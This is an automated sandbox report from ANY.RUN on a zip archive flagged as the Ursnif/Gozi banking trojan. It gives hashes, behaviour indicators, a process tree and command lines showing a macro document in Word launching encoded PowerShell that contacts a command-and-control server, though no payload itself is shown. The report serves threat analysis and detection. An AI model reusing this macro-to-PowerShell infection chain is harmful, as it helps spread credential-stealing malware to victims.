General Info

File name

SPAM2.zip

Full analysis
https://app.any.run/tasks/c8e20bba-c362-4596-adbb-2e46940ebaef
Verdict
Malicious activity
Analysis date
7/18/2019, 16:49:10
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

macros

macros-on-open

gozi

ursnif

trojan

dreambot

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

b3f3636560e23bd67c8818deb247c3e5

SHA1

e3ed2bb34418f3c2867746a57e7a647d9f2dee01

SHA256

0eae1f57f48a22fd2ae7361e8a24432b3d28ce2f07cbec474d1e75889939205a

SSDEEP

3072:Hf/Q5ewaZha9h3kj+mbh5Sp4/N/mG4u7iMMtNvk9xBkQSMA1oAqDS:Hxha91gfbxVmG4uov89U36Aq+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
660 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
  • Mozilla Maintenance Service (67.0.4)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

Connects to CnC server
  • IEXPLORE.EXE (PID: 2828)
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2476)
URSNIF was detected
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2828)
  • powershell.exe (PID: 2080)
  • IEXPLORE.EXE (PID: 2476)
Executes PowerShell scripts
  • WINWORD.EXE (PID: 2904)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 2904)
Application was dropped or rewritten from another process
  • styer10.gxl.exe (PID: 3012)
Executed via COM
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
Creates files in the user directory
  • powershell.exe (PID: 2080)
Reads the machine GUID from the registry
  • powershell.exe (PID: 2080)
  • WinRAR.exe (PID: 2940)
Executable content was dropped or overwritten
  • WinRAR.exe (PID: 2940)
Creates files in the user directory
  • WINWORD.EXE (PID: 2904)
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2476)
  • IEXPLORE.EXE (PID: 2828)
Reads settings of System Certificates
  • IEXPLORE.EXE (PID: 2476)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
  • IEXPLORE.EXE (PID: 2828)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2640)
  • IEXPLORE.EXE (PID: 2828)
  • IEXPLORE.EXE (PID: 2476)
Reads Internet Cache Settings
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
  • WINWORD.EXE (PID: 2904)
Changes internet zones settings
  • iexplore.exe (PID: 1924)
  • iexplore.exe (PID: 1440)
  • iexplore.exe (PID: 2448)
Manual execution by user
  • styer10.gxl.exe (PID: 3012)
  • WINWORD.EXE (PID: 2904)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2904)

Find more information about signature artifacts and mapping to the MITRE ATT&CK™ MATRIX in the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
null
ZipCompression:
Deflated
ZipModifyDate:
2019:07:18 16:38:23
ZipCRC:
0xa0a27187
ZipCompressedSize:
162839
ZipUncompressedSize:
287232
ZipFileName:
styer10.gxl.exe

Processes

Total processes
50
Monitored processes
10
Malicious processes
8
Suspicious processes
0

Behavior graph

Graph nodes in order (a #URSNIF tag marks the node it precedes; "no specs" means no specs were attached to that node):

  • start
  • winrar.exe
  • styer10.gxl.exe (no specs)
  • winword.exe (no specs)
  • powershell.exe (#URSNIF)
  • iexplore.exe
  • iexplore.exe (#URSNIF)
  • iexplore.exe
  • iexplore.exe (#URSNIF)
  • iexplore.exe
  • iexplore.exe (#URSNIF)
Specs description

  • Program did not start
  • Integrity level elevation
  • Task contains an error or was rebooted
  • Process has crashed
  • Task contains several apps running
  • Executable file was dropped
  • Debug information is available
  • Process was injected
  • Network attacks were detected
  • Application downloaded the executable file
  • Actions similar to stealing personal data
  • Behavior similar to exploiting the vulnerability
  • Inspected object has suspicious PE structure
  • File is detected by antivirus software
  • CPU overrun
  • RAM overrun
  • Process starts the services
  • Process was added to the startup
  • Behavior similar to spam
  • Low-level access to the HDD
  • Probably Tor was used
  • System was rebooted
  • Connects to the network
  • Known threat

Process information

PID
2940
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SPAM2.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\installer\{90140000-003d-0000-1000-0000000ff1ce}\wordicon.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
3012
CMD
"C:\Users\admin\Desktop\styer10.gxl.exe"
Path
C:\Users\admin\Desktop\styer10.gxl.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Paper Other
Description
Loud Smile Pr Thing
Version
2.4.82.85 Better
Modules
Image
c:\users\admin\desktop\styer10.gxl.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\clbcatq.dll
c:\windows\syswow64\wbem\wbemprox.dll
c:\windows\syswow64\wbemcomn.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\wbem\wbemsvc.dll
c:\windows\syswow64\wbem\fastprox.dll
c:\windows\syswow64\ntdsapi.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\sxs.dll

PID
2904
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Ursnif_Usa.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.5123.5000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\comsvcs.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\msohev.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\spool\drivers\x64\3\unidrvui.dll
c:\windows\system32\spool\drivers\x64\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\x64\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll

PID
2080
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc 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
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\userenv.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\microsoft.net\framework64\v2.0.50727\diasymreader.dll
c:\windows\system32\netutils.dll

PID
2448
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
